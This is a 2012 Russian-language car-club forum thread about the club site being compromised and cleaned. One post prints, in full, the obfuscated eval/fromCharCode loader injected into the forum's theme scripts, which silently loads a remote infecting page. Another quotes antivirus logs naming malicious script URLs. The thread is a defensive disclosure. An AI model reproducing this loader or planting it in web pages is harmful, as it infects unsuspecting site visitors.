АВТОМОБИЛЬНЫЙ КЛУБ KIA MAGENTIS CLUB (KIA OPTIMA CLUB)
ПАРТНЕРЫ, БАРАХОЛКА, ТРЕП => РАБОТА САЙТА И ФОРУМА => Тема начата: Tim$ от 05 Апреля 2012, 13:53:24
-
При переходе на родной сайт выдаёт такую картину:(http://content.foto.mail.ru/list/365150/1/i-80.jpg)
Чего это за фигня такая???
-
типо вирус?
-
типо вирус?
пишет что с сайт рассылает вирусы, не знаю почему картинка такая маленькая получилась
-
Уже вылечили, так что можете заходить.
-
Ночью (около 5 утра) сервер подвергся нападению, было перезаписано часть файлов. С утра (около 9:30) все файлы были перезаписаны в исходное состояние, однако некоторое время браузеры еще могут ругаться "по старой памяти".
-
Уже вылечили, так что можете заходить.
аа ну хорошо....
-
Дома аваст стал ругаться на сайт.
-
Мозила до сих пор такую хрень мне выдаёт ??? ???
-
каспер тоже вопит.
-
Уважаемая Администрация!
Форум, похоже, все еще заражен и пытается запустить Java для заражения компьютеров пользователей.
Обратите внимание на подключаемые JavaScript из файлов
http://forum.club-magentis.ru/Themes/default/scripts/script.js?rc2
http://forum.club-magentis.ru/Themes/default/scripts/theme.js?rc2
http://forum.club-magentis.ru/Themes/default/scripts/sha1.js
http://forum.club-magentis.ru/Themes/default/scripts/topic.js
а также, возможно, другие скрипты, подгружаемые на других страницах.
Перечисленные скрипты содержат код, которого нет в оригинальных скриптах движка SMF. Более того, код обфусцирован, чтобы было непонятно, что он пытается сделать:
c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Date().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i81i73i13i16i17i62i64i6i59i64i76i68i71i69i76i72i67i75i6i64i71i69i61i62i76i72i6i70i61i76i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;692!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);
После расшифровки и исполнения этот код вставляет на страницу скрытый iframe с сайтом, пытающимся заразить компьютеры пользователей.
-
Блин, админ уехал на неделю на Украину. Без него я сейчас ничего сделать не могу. Попытаюсь его выцепить. Пока всем рекомендую выключать ява-скрипты.
-
у меня тоже ругаться начал - "троянская программа".
-
У меня тож каспер матерится :D
-
лячить надо
-
Бацилы веселятся! Сегодня уже другие:
10.04.2012 10:29:13 URL-адрес: http://jy9e1.hnxbptlmuf.servegame.org/g/8065332574792756.js База подозрительных веб-адресов: обнаружено
10.04.2012 10:33:02 URL-адрес: http://ayq589fh.chtlomtpks.homeftp.net/g/7203501818538267.js База подозрительных веб-адресов: обнаружено
10.04.2012 10:29:23 URL-адрес: http://jy9e1.hnxbptlmuf.servegame.org/g/701395120993411.js База подозрительных веб-адресов: обнаружено
10.04.2012 10:33:20 URL-адрес: http://jy9e1.hnxbptlmuf.servegame.org/g/309862693616833.js База подозрительных веб-адресов: обнаружено
10.04.2012 10:34:14 URL-адрес: http://ayq589fh.chtlomtpks.homeftp.net/g/924298140565428.js База подозрительных веб-адресов: обнаружено
-
У меня уже всё в порядке :)
-
Трояны долбят по прежнему, так и не могу дозвониться до админа
-
Да, снова началось
-
С домашнего компа не ругается, а вот с рабочего сразу кричит что всё... троян
-
Тоже
-
С домашнего компа не ругается, а вот с рабочего сразу кричит что всё... троян
На домашнем наверно антивирус постарее))
-
Всем доброго дня!!!!
При заходе на форум и перемещении по темам и страницам NOD ругается на троян!!!
-
Тоже самое.(
-
У меня тоже уже в третий день.
-
Троян вылечен, постарался усилить безопасность :)
Извиняюсь, что так долго добирался до компа, его у меня просто не было.. :(
-
сегодня было тоже самое(
-
Хм.. у меня на одном компе касперский, на другом Нод, оба реагировали, но после лечения оба молчат.
Если говорить про яндекс, который "окрещивает" сайт опасным, то он снимет этот статус только после перепроверки, которая может пройти только через несколько дней.
Какой антивирус ругается и на что?
У кого-нибудь еще возникают предупреждения антивируса?
-
фаерфокс ругается при переходе на сайт, антивируса нет.... :-\ :D
-
Фаерфокс с яндекс баром? Тогда скорее всего это из-за пометки яндекса. Например, браузер Яндекс.Интернет также ругается, только из-за того что связан с ним.
-
У меня касперский энтернет секьюрити 2012.пишит что траянская и сайт вредит компьютеру.((
-
Фаерфокс с яндекс баром? Тогда скорее всего это из-за пометки яндекса. Например, браузер Яндекс.Интернет также ругается, только из-за того что связан с ним.
да ,с баром, че сделать то надо? :-\
-
теперь NOD не ругается. похоже вылечили.
-
Админ вернулся и поборол вирус, приношу всем извинения за возможность заражения.
-
А у меня без изменения.(
-
А у меня без изменения.(
Очень странно, возможно, интернет секьюрити тоже связан как-то с яндексом и получает от него информацию о подозрительных сайтах.. В любом случае, сайт отправлен в яндекс на перепроверку, должна пройти за несколько дней, если после этого секьюрити касперского продолжит ругаться, то будем думать. Антивирус касперского молчит.
да ,с баром, че сделать то надо? :-\
Ничего :) Ждем когда яндекс снимет пометку.
-
Хорошо)
-
Symantec endpoint protection 12 успокоился наконец-то. А вот части аваторок я не вижу.
-
Symantec endpoint protection 12 успокоился наконец-то. А вот части аваторок я не вижу.
Аналогично
-
Мне свою аватару пришлось перезаливать.
-
Не я вижу все аватарки,но ругается.
-
Не я вижу все аватарки,но ругается.
Антивирус ругается или в браузере предупреждение?
-
Антивирус теперь молчит.)А появляется вот такая картинка(
-
У меня Мозила фирафокс.
-
У меня Мозила фирафокс.
Это нормально, это предупреждение исчезнет через несколько дней, когда яндекс проиндексирует вирусную активность.
-
Ясно)Хорошо)))
-
Часть залитых фотографий на форум пропала. Восстановить можно, или перезаливать?
-
Часть залитых фотографий на форум пропала. Восстановить можно, или перезаливать?
Попробую восстановить, но пока не гарантирую :(
-
Вложения и аватары восстановлены.
-
"...Последняя проверка сайта не выявила страниц, содержащих вредоносный код. В результатах поиска сайт выводится без пометок.
---
С уважением,
Яндекс..."
:)
Теперь фаерфокс не должен ругаться.
-
Ура,у меня все нормально)))
-
Вроде тоже больше не ругается!
-
Все нормульно, Firefox не ругается )
-
Можете не дублировать, теперь ни у кого ругаться не будет. :)